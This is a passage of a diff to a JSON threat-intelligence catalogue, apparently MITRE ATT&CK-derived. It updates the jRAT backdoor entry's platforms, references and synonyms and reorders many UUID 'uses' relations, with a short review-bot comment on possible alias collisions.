+ "description": "[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)",
 "meta": {
 "external_id": "S0283",
 "mitre_platforms": [
 "Linux",
 "Windows",
- "macOS"
+ "macOS",
+ "Android"
 ],
 "refs": [
 "https://attack.mitre.org/software/S0283",
- "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques",
+ "https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf"
 ],
 "synonyms": [
 "jRAT",
+ "JSocket",
+ "AlienSpy",
+ "Frutas",
+ "Sockrat",
+ "Unrecom",
+ "jFrutas",
+ "Adwind",
+ "jBiFrost",
 "Trojan.Maljava"
 ]
 },
 "related": [
- {
- "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf",
 "tags": [
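Review bot: The widened `synonyms` list on the new side (`JSocket`, `AlienSpy`, `Frutas`, `Sockrat`, `Unrecom`, `jFrutas`, `Adwind`, `jBiFrost`) folds several names that are commonly tracked as distinct families into the single `S0283` entry, so any other cluster in this repository that already has its own entry for one of those names will now resolve the same alias to two UUIDs. That is worth checking before merge, since consumers that match on synonyms will otherwise get ambiguous lookups; I cannot see the other clusters from this hunk, so this is an inference. Note also that the new `description` carries the upstream text verbatim, including the missing space in `model.(Citation: Kaspersky Adwind Feb 2016)`; if the generator normalises citation spacing elsewhere this one slipped through. The entry's `related` array continues past the end of the hunk.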
@@ -19534,14 +21997,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19561,6 +22024,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2",
 "tags": [
@@ -19574,6 +22044,132 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2ba5aa71-9d15-4b22-b726-56af06d9ad2f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "efece7e8-e40b-49c2-9f84-c55c5c93d05c",
@@ -19595,34 +22191,6 @@
 ]
 },
 "related": [
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e",
 "tags": [
@@ -19630,41 +22198,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
 "tags": [
@@ -19673,7 +22206,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19686,6 +22226,27 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
 "tags": [
@@ -19693,12 +22254,54 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
+ },
+ {
+ "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
 }
 ],
 "uuid": "069af411-9b24-4e85-b26c-623d035bbe84",
@@ -19729,7 +22332,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "76c12fc8-a4eb-45d6-a3b7-e371a7248f69",
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19743,14 +22346,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0",
+ "dest-uuid": "76c12fc8-a4eb-45d6-a3b7-e371a7248f69",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19777,6 +22380,20 @@
 ]
 },
 "related": [
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
 "tags": [
@@ -19792,7 +22409,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19805,6 +22429,13 @@
 ],
 "type": "uses"
 },
+ {
+ "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
 {
 "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
 "tags": [
@@ -19813,21 +22444,7 @@
 "type": "uses"
 },
 {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19841,7 +22458,14 @@
 "type": "uses"
 },
 {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19855,7 +22479,42 @@
 "type": "uses"
 },
 {
- "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19875,62 +22534,6 @@
 ],
 "type": "uses"
 },
- {
- "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
 {
 "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
 "tags": [
@@ -19959,21 +22562,14 @@
 },
 "related": [
 {
- "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44",
+ "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
+ "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -19987,14 +22583,21 @@
 "type": "uses"
 },
 {
- "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
+ "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060",
+ "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -20021,35 +22624,28 @@
 },
 "related": [
 {
- "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619",
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "uses"
 },
 {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e",
+ "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -20063,7 +22659,42 @@
 "type": "uses"
 },
 {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "519630c5-f03f-4882-825c-3af924935817",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -20084,49 +22715,7 @@ "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20140,14 +22729,28 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -20181,7 +22784,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20195,14 +22798,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20216,7 +22812,14 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20243,21 +22846,14 @@ }, "related": [ { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20277,6 +22873,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ 
@@ -20285,14 +22888,14 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20306,7 +22909,7 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20333,14 +22936,7 @@ }, "related": [ { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20354,7 +22950,14 @@ "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20389,14 +22992,7 @@ }, "related": [ { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -20410,42 +23006,14 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20459,14 +23027,28 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 